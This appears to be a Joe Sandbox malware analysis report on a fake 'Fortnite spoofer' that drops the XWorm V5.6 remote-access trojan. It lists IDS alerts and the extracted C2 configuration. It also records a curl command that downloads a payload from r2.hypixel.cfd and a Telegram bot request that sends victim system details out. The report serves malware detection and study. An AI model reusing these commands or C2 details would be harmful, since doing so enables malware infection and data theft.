                            2024-11-23T21:03:32.015251+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:03:44.739529+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:03:57.818615+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:03:58.126970+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:10.894733+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:23.980400+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:31.739407+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:32.655876+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:36.985967+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:48.784656+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:49.285345+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:52.906436+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:54.489032+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:54.608635+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:54.728415+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:04:54.848808+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:00.439092+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:00.566683+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:00.730220+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:00.849831+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:03.842107+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:07.111881+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:07.310411+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:09.516554+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:12.594933+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:12.720220+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:12.941567+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:14.951464+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:26.894889+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:31.653759+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:38.716530+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:39.017669+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:39.265257+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:39.502159+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:39.986161+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:44.555068+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:49.604419+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:50.499487+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:50.700760+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:51.593221+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:05:55.860453+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:00.704112+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:00.904480+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:01.903762+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:02.491826+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:15.396263+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:16.228275+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:16.457196+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:16.624665+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:29.190148+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:34.570564+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:42.806358+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:44.832141+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:46.631866+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:51.526216+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:06:52.273835+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:07:00.932230+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:07:02.382413+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:07:03.206395+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:07:08.595658+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            2024-11-23T21:07:11.749735+010028529231Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T21:03:35.005493+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:05.021284+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:35.036903+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:05.053094+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:35.069157+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:05.390110+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:35.084989+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:05.084425+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T21:05:31.287399+010028531931Malware Command and Control Activity Detected192.168.2.749711104.198.168.1791337TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://r2.hypixel.cfd/svchost.exeAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Windows\StartMenuExperienceHost.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Found malware configuration
                            Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 87%
                            Source: C:\Windows\StartMenuExperienceHost.exeReversingLabs: Detection: 87%
                            Multi AV Scanner detection for submitted file
                            Source: 18sFhgSyVK.exeReversingLabs: Detection: 23%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Machine Learning detection for dropped file
                            Source: C:\Windows\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: 127.0.0.1,104.198.168.179
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: 1337
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: <123456789>
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: <Xwormmm>
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: XWorm V5.6
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: USB.exe
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: %Temp%
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpackString decryptor: svchost.exe
                            Source: unknownHTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                            Source: 18sFhgSyVK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb&& source: 18sFhgSyVK.exe
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb source: 18sFhgSyVK.exe

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.7:49711
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.7:49711
                            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49704 -> 149.154.167.220:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 127.0.0.1
                            Source: Malware configuration extractorURLs: 104.198.168.179
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: global trafficHTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silentJump to behavior
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: r2.hypixel.cfdUser-Agent: curl/7.83.1Accept: */*
                            Source: global trafficHTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: r2.hypixel.cfd
                            Source: global trafficDNS traffic detected: DNS query: time.windows.com
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 23 Nov 2024 20:03:15 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: svchost.exe, 00000005.00000002.1365183174.00000135A5613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drString found in binary or memory: https://api.telegram.org/bot
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                            Source: svchost.exe, 00000005.00000003.1364326636.00000135A5675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
                            Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                            Source: svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272971937.0000016CB93A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe
